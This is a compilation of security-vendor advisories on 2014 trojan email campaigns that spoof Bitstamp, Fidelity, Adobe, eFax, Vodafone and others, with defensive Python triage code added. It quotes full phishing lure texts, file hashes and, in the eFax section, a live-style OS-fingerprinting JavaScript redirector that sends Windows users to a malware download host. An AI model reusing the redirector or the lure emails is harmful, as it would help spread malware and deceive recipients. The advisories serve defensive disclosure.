Fake email regarding Bitstamp new banking details contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “New bank details”.

This email is sent from the spoofed address “Bitstamp.net <no_reply@bitstamp.net>”, while the real SMTP sender is AmericanExpress@welcome.aexp.com, and has the following body:

New banking details

Dear Bitstamp clients,

We would like to inform you that Bitstamp now has new bank details, please check attached file.

We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.

Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.

Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.

Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED

The attached ZIP file has the name bank details.zip and contains the 24 kB file bank details.scr.

The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S.

At the time of writing, 4 of the 53 AV engines detected the trojan at Virus Total. MX Lab has also intercepted some emails without the malicious attachment, but be aware that this email is a risk.

Use the Virus Total permalink for more detailed information.
SHA256: 83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769
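The give-away in this campaign is the gap between the display sender (bitstamp.net) and the real SMTP sender (welcome.aexp.com). As an added illustration, not part of the MX Lab post, the Python routine below compares the From domain with the envelope sender recorded in Return-Path and lists attachments, flagging the combination of a forged sender domain and an archive attachment. The message is a constructed sample modelled on the headers described above; it is not the real campaign email, and the base64 payload is a placeholder.

```python
import email
from email import policy
from email.utils import parseaddr

ARCHIVE_EXTENSIONS = (".zip", ".rar", ".7z", ".cab")

# Constructed sample message modelled on the campaign described above (not the
# real email): the From header claims bitstamp.net, while the envelope sender
# recorded in Return-Path by the receiving mail server is a different domain.
SAMPLE_MESSAGE = b"""Return-Path: <AmericanExpress@welcome.aexp.com>
From: "Bitstamp.net" <no_reply@bitstamp.net>
To: victim@example.invalid
Subject: New bank details
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Dear Bitstamp clients,

We would like to inform you that Bitstamp now has new bank details, please check attached file.

--b1
Content-Type: application/zip; name="bank details.zip"
Content-Disposition: attachment; filename="bank details.zip"
Content-Transfer-Encoding: base64

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==
--b1--
"""


def domain_of(header_value):
    """Lower-cased domain of the first address in a header value ('' if none)."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def triage_message(raw_bytes):
    """Compare the claimed From domain with the envelope sender and list attachments."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    from_domain = domain_of(msg.get("From"))
    envelope_domain = domain_of(msg.get("Return-Path"))
    attachments = [part.get_filename() or "" for part in msg.iter_attachments()]
    archive_attached = any(name.lower().endswith(ARCHIVE_EXTENSIONS) for name in attachments)
    sender_mismatch = bool(from_domain and envelope_domain and from_domain != envelope_domain)
    return {
        "from_domain": from_domain,
        "envelope_domain": envelope_domain,
        "sender_mismatch": sender_mismatch,
        "attachments": attachments,
        "archive_attached": archive_attached,
        # A forged display domain plus an archive attachment is the pattern this post describes.
        "suspicious": sender_mismatch and archive_attached,
    }


if __name__ == "__main__":
    for key, value in triage_message(SAMPLE_MESSAGE).items():
        print(f"{key}: {value}")
```

A mismatch between From and Return-Path is normal for mailing lists and some forwarding setups, so on its own it is only a signal; combined with an archive attachment carrying an .scr file it is worth quarantining for a closer look.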

Fake email from the Pegler Yorkshire Group regarding a daily report contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “FW: Daily report” that is supposed to come from the Pegler Yorkshire Group, a British manufacturer of valves and engineering products.

This email is sent from the spoofed address “Ian Howarth <Ian.Howarth@pegleryorkshire.co.uk>” and has the following body:

Please review attached document.

—————————-

http://www.pegleryorkshire.co.uk

Head Office| St. Catherine’s Avenue, Doncaster, South Yorkshire, DN4 8DF, England.

Registered in England Company No. 00401507, Registered Office| Pegler Yorkshire Group Limited, St. Catherine’s Avenue, Doncaster, South Yorkshire, DN4 8DF, England. An Aalberts Industries Company.

DISCLAIMER: The information in this message is confidential and may be legally privileged. It is intended solely for the addressee. Access to this message by anyone else is unauthorised. If you are not the intended recipient, any disclosure, copying, or distribution of the message, or any action or omission taken by you in reliance on it, is prohibited and may be unlawful. Please immediately contact the sender if you have received this message in error. Any views/opinions expressed in this email are solely those of the author and not of the company. The company may monitor communications for business purposes. Copyright in this email belongs to Pegler Yorkshire Group Limited, ALL RIGHTS RESERVED. This e-mail has been scanned for all known viruses by our systems however the company accepts no liability for any damage caused by any virus transmitted by this email.
—————————-

The attached ZIP file has the name F44907162.zip and contains the 22 kB file F44907162.scr (note: numbers may vary).

The trojan is known as Troj.W32.Gen or HEUR/QVM20.1.Malware.Gen.

At the time of writing, 2 of the 54 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: c9189ab85dcb7782bd048d1b91b6c2c414d6f7e7197f1e7a11189a92ad43c9f7

UPDATE 21/10/2014 12:20:

The same trojan is also being distributed by email with content other than that shown above. This example is supposed to come from the company 888 Publishing Ltd and has the same subject line “FW: Daily report”, so we might expect to see more similar emails with different content.

Please review attached document.
Kind regards,

Carrie Lancaster – Editor
carrie.lancaster@biopharma-asia.com

888 Publishing Ltd
6 Mitre Passage
Greenwich Peninsula
London
SE10 0ER
United Kingdom

T: +44 (0) 203 440 7106
F: +44 (0) 203 440 7115
W: http://www.biopharma-asia.com
CO#: 08048039
Find Us Online
FacebookTwitterGoogle+Linkedin

This message and any files transmitted with it are the property of 888 Publishing Ltd, are confidential, and are intended solely for the use of the person or entity to whom this e-mail is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please contact the sender and delete his message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited.

Fake Fidelity email “401k June 2014 Fund Performance and Participant Communication” contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “401k June 2014 Fund Performance and Participant Communication” regarding a Fidelity fund performance report.

This email is sent from the spoofed address “Cora Mccracken <CoraMccracken@fidelity.com>” and has the following body. Note that the subject refers to a report for June while the body of the email and the attached ZIP archive use October; this appears to be a small mistake on the sender's side.

Co-op 401k Plan Participants -

Attached you will find the October 2014 401k fund performance results as well as an informational piece regarding online calculators available on the website.

If you are a facility manager, please forward, print or post a copy of these pages on your bulletin board or in a conspicuous place where your employees can see them.

Please contact me if you have any questions.

Cora Mccracken

Employee Benefits/Plan Administrator

615.793.3210

The attached ZIP file has the name October-2014-401k-Fund.zip and contains the 23 kB file October-2014-401k-Fund.scr.

The trojan is known as Win32.Malware!Drop, W32/Trojan3.LNK, Trojan.Upatre.100, W32/Trojan.DXKV-8011 or Win32/TrojanDownloader.Waski.A.

At the time of writing, 12 of the 54 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: 782d490bedb9e65bb1640a4d08e0e3debe2c11b270415aeb8bbfb83377469a3b

Latest email “my new photo ;)” contains a new trojan variant


MX Lab, http://www.mxlab.eu, started to intercept a new distribution campaign of a new trojan variant by email with the subject “my new photo ;)”.

This type of campaign has been running for some time now (see the other blog articles of 26 September, 16 September, 5 September and 22 August 2014) and still appears in the wild with a very low detection rate by anti-virus engines.

This email is sent from spoofed email addresses and has the following short body:

my new photo ;)

The attached ZIP file has the name photo.zip; once extracted, it yields a folder photo that contains the 57 kB file photo.exe.

The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen.

At the time of writing, 2 of the 53 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: 83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5

 

Fake email Adobe Invoice, regarding an Adobe Creative Cloud Service invoice, contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Adobe Invoice” which is quite similar to a previous malicious campaign but in that case a Word document was used.

This email is sent from the spoofed address “Adobe Billing <billing@adobe.com>” and has the following body:

Dear Customer,

Thank you for signing up for Adobe Creative Cloud Service.

Attached is your copy of the invoice.
Thank you for your purchase.

Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot:

The attached ZIP file has the name adb-102288-invoice.zip and contains the 117 kB file c3.exe.

The trojan is known as PE:Malware.FakePDF@CV!1.9C3A or Win32.Trojan.Inject.Auto.

At the time of writing, 2 of the 53 AV engines detected the trojan at Virus Total, so be careful when handling this email.

Use the Virus Total permalink for more detailed information.
SHA256: 39475a931af23d7d61e2898bcd2e5f69f8e6770848a306980ea8ef6dcfc2bc08

Fake email eFax message contains URL that leads to malicious ZIP archive


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “eFax message from "02086164497" – 1 page(s), Caller-ID: 208-616-4497”.

This email is sent from the spoofed address “eFax <message@inbound.*******>” and has the following body:

Fax Message [Caller-ID: 208-616-4497]
You have received a 1 page fax at 2014-10-05 11:34:48 GMT.

* The reference number for this fax is lon2_did11-2974913177-8345459349-35.

Please visit https://www.efax.co.uk/myaccount/message/lon2_did11-2974913177-8345459349-35 to view this message in full.

Thank you for using the eFax service!

Screenshot of the email:

The embedded URL hxxp://lanuez.cl/wp-content/themes/cityhub/mess.html leads to a redirect page with the following script:

<script>
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";
var1=112;
var2=var1;
if(OSName=="Windows") {location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}
</script>

This script clearly shows that it is targeting Windows users. In all other cases, you’re redirected towards Google with a search query on eFax. The site hxxp://200.59.14.44:8080/ord/ef.html shows us the following layout and allows us to download the malicious fax in ZIP format.
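The script above has two tell-tale properties a mail or web gateway can check for automatically: it reads navigator.appVersion to fingerprint the operating system, and the Windows branch redirects to a bare IP address on port 8080 while everyone else is sent to Google. As an added example (not code from the MX Lab post), the Python below pulls the location.replace() / location.assign() / location.href targets out of a fetched page and scores that combination. The HTML is constructed from the quoted script with the URLs kept defanged (hxxp), which the URL parser handles like any other scheme.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: the redirect page quoted above, URLs kept defanged (hxxp).
SAMPLE_HTML = """<html><body><script>
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if (navigator.appVersion.indexOf("Mac")!=-1) OSName="MacOS";
if (navigator.appVersion.indexOf("X11")!=-1) OSName="UNIX";
if (navigator.appVersion.indexOf("Linux")!=-1) OSName="Linux";
var1=112;
var2=var1;
if(OSName=="Windows") {location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}
</script></body></html>"""

# Matches location.replace("..."), location.assign('...') and location.href = "..."
REDIRECT_RE = re.compile(
    r"""location(?:\.href\s*=|\.replace\s*\(|\.assign\s*\()\s*["']([^"']+)["']"""
)
# Client-side OS / browser fingerprinting that typically gates a conditional redirect.
FINGERPRINT_RE = re.compile(r"navigator\.(?:appVersion|userAgent|platform)\b")


def inspect_target(url):
    """Describe one redirect target: a bare-IP host and a non-standard port are the signals."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        bare_ip = True
    except ValueError:
        bare_ip = False
    port = parts.port
    return {
        "url": url,
        "host": host,
        "bare_ip": bare_ip,
        "port": port,
        "nonstandard_port": port not in (None, 80, 443),
    }


def analyze_redirect_page(html):
    """Extract redirect targets and score the page as a fingerprint-gated redirector."""
    targets = [inspect_target(u) for u in REDIRECT_RE.findall(html)]
    fingerprinting = FINGERPRINT_RE.search(html) is not None
    risky = [t for t in targets if t["bare_ip"] or t["nonstandard_port"]]
    return {
        "os_fingerprinting": fingerprinting,
        "redirects": targets,
        "risky_targets": [t["url"] for t in risky],
        # Fingerprinting plus at least one redirect to an IP:port host is the pattern above.
        "suspicious": fingerprinting and bool(risky),
    }


if __name__ == "__main__":
    result = analyze_redirect_page(SAMPLE_HTML)
    print("OS fingerprinting:", result["os_fingerprinting"])
    for target in result["redirects"]:
        print(target)
    print("suspicious:", result["suspicious"])
```

The decoy branch matters for analysts as much as the Windows branch: a sandbox that fetches the page with a non-Windows User-Agent only ever sees the Google redirect, so any automated follow-up should request the page with a Windows browser identity before concluding the link is clean.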

The downloaded ZIP file has the name FAX_20141008_1412786088_26.zip and contains the folder FAX_20141008_1412786088_26 with the 61 kB file FAX_20141008_1412786088_26.exe. Numbers may vary in the file names.

The trojan is known as Malware.QVM20.Gen.

At the time of writing, 1 of the 54 AV engines detected the trojan at Virus Total, so do not download any files from this host.

Use the Virus Total permalink for more detailed information.
SHA256: 3dd29684ab081569d4ce723b16f22b7bcc8301df2657177802bc71c7a375307e

Fake email “Kopie Vodafone contract” contains trojan


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Kopie Vodafone contract”.

This email is sent from the spoofed address “noreply.nl@vodafone.com” and has the following body in Dutch and English:

Dear customer,

Thank you for visiting Vodafone Winkel!

This e-mail contains the agreement you signed today in Vodafone Winkel. Keep it safe!

We attach great value to the privacy of our customers. That is why we send the agreement by e-mail without a signature, and the agreement is secured with the password you provided in the shop.

If you have unexpectedly forgotten the password, you can request a copy in the Vodafone Winkel where you concluded the agreement. Do not forget to bring valid identification.

Kind regards,

Vodafone Winkel


Dear customer,

We thank you for visiting Vodafone Winkel!

This e-mail contains the agreement you signed today in the Vodafone shop. Please store this agreement for future reference.

To protect your privacy, the agreement has been sent without your signature and is secured with the password you agreed upon in the shop. You will need this password to open and view the contents of this document.

In case you forget the password, you can get a copy of the agreement by visiting the Vodafone shop where you signed the agreement. Please bring a valid identification with you.

Best regards,

Vodafone Winkel


PLEASE NOTE: This message was sent by an automated system. Replies to this message are not read or forwarded. If you have any questions about this message, please go to your point of sale.

All Vodafone products and services are subject to the General and Additional Service Terms and Conditions and the Privacy Statement (together the “Voorwaarden”). By (digitally) signing the agreement you have accepted these Terms and Conditions. These Terms and Conditions are also available (free of charge) via Vodafone Winkel, Vodafone Customer Service or via the Vodafone website ( http://www.vodafone.nl ).

Disclaimer:
This message (including attachments) is confidential and intended only for the addressee of this message. If you have received this message by mistake, you are requested to inform the sender and delete the message. It is not permitted to view, use or distribute this message, in whole or in part, without permission.
Vodafone Libertel B.V. (“Vodafone”) excludes any liability if the information in this e-mail arrives incorrectly, incompletely or late, as well as any liability for possible damage arising from this e-mail. Vodafone does not guarantee that the message is free from manipulation by third parties or computer programs used to intercept electronic messages and/or transmit viruses.

PLEASE NOTE: This message has been sent from an automated system. Please DO NOT reply to this message as it is send from an unattended mailbox

All Vodafone products and services are subject to Terms & Conditions (also collectively known as “Voorwaarden”). These Terms & Conditions are also available (free of charge) at the Vodafone shop, Vodafone Customer Service or through the Vodafone website ( http://www.vodafone.nl ).

Disclaimer:
This message and any files or documents attached are strictly confidential or otherwise legally protected. It is intended only for the individual or entity named. If you are not the named addressee or have received this email in error, please inform the sender immediately, delete it from your system and do not copy or disclose it or its contents or use it for any purpose. Please also note that transmission cannot be guaranteed to be secure or error-free.
Vodafone Libertel BV (“Vodafone”) excludes any liability for the information in this email if it is found to be incorrect, incomplete or not delivered in time, and any liability for any damages arising as a result of this email. Vodafone does not guarantee that this message is free from manipulation by third parties or computer programs used to intercept electronic messages and / or spread viruses.

The attached ZIP file has the name document_contract _pdf.zip and contains the 137 kB file document_contract _pdf.exe.

At the time of writing, 0 of the 54 AV engines detected the trojan at Virus Total, so be very careful when receiving and handling this email.

Use the Virus Total permalink for more detailed information.
SHA256: cbdd8e2eccaa44f31b4217bd271f665becb2b9ffeaa8eb25c5920ef9b5d7026b
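Every campaign on this page uses the same delivery trick: a ZIP archive whose only payload is a small .scr or .exe, often with a document-looking name such as document_contract _pdf.exe or a bare photo.exe inside a folder. Since AV detection was 0 to 12 engines out of 54 at the time these were intercepted, a gateway rule that inspects the archive listing itself is a better first line than signatures. As an added example (not MX Lab's own tooling), the Python below opens an archive in memory, flags executable extensions and document-lure naming, checks for the MZ header of a Windows executable, and computes the SHA256 of each entry for a Virus Total lookup. The archive it builds is a constructed stand-in with placeholder bytes, not any of the real samples.

```python
import hashlib
import io
import re
import zipfile

# Extensions Windows will execute directly when the user double-clicks them.
EXECUTABLE_EXTENSIONS = {
    ".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jse",
    ".vbs", ".vbe", ".wsf", ".hta", ".cpl",
}
# A document-type token glued to the end of the stem ("_pdf", ".doc", "-invoice.xls")
# is the lure pattern seen in the Vodafone sample above.
LURE_RE = re.compile(r"[._-](pdf|doc|docx|xls|xlsx|jpg|jpeg|png|txt)$", re.IGNORECASE)

# Constructed placeholder content; these bytes are not a real PE file.
SAMPLE_PE_BYTES = b"MZ" + b"\x00" * 62 + b"constructed placeholder, not a real PE"


def sha256_hex(data):
    """SHA256 hex digest, the value you would paste into Virus Total."""
    return hashlib.sha256(data).hexdigest()


def build_sample_archive():
    """Constructed stand-in for the attachments described on this page (not real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("document_contract _pdf.exe", SAMPLE_PE_BYTES)
        zf.writestr("photo/photo.exe", b"MZ constructed placeholder")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


def triage_archive(archive_bytes):
    """List every file in the archive with the signals a mail gateway would act on."""
    entries = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            stem, dot, ext = base.rpartition(".")
            ext = ("." + ext).lower() if dot else ""
            executable = ext in EXECUTABLE_EXTENSIONS
            data = zf.read(info)
            entries.append({
                "name": info.filename,
                "size": info.file_size,
                "extension": ext,
                "executable": executable,
                "document_lure": executable and LURE_RE.search(stem) is not None,
                "mz_header": data[:2] == b"MZ",
                "sha256": sha256_hex(data),
            })
    return {
        "archive_sha256": sha256_hex(archive_bytes),
        "entries": entries,
        # Any directly executable member is enough to hold the message for review.
        "block": any(e["executable"] for e in entries),
    }


if __name__ == "__main__":
    report = triage_archive(build_sample_archive())
    print("archive sha256:", report["archive_sha256"])
    for entry in report["entries"]:
        print(entry)
    print("block:", report["block"])
```

Reading the archive listing costs nothing compared with detonation and catches the whole family regardless of which AV name (Upatre, Waski, Kryptik, generic heuristics) a given sample ends up with; the per-entry SHA256 is what lets you correlate your catch with the permalinks above.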
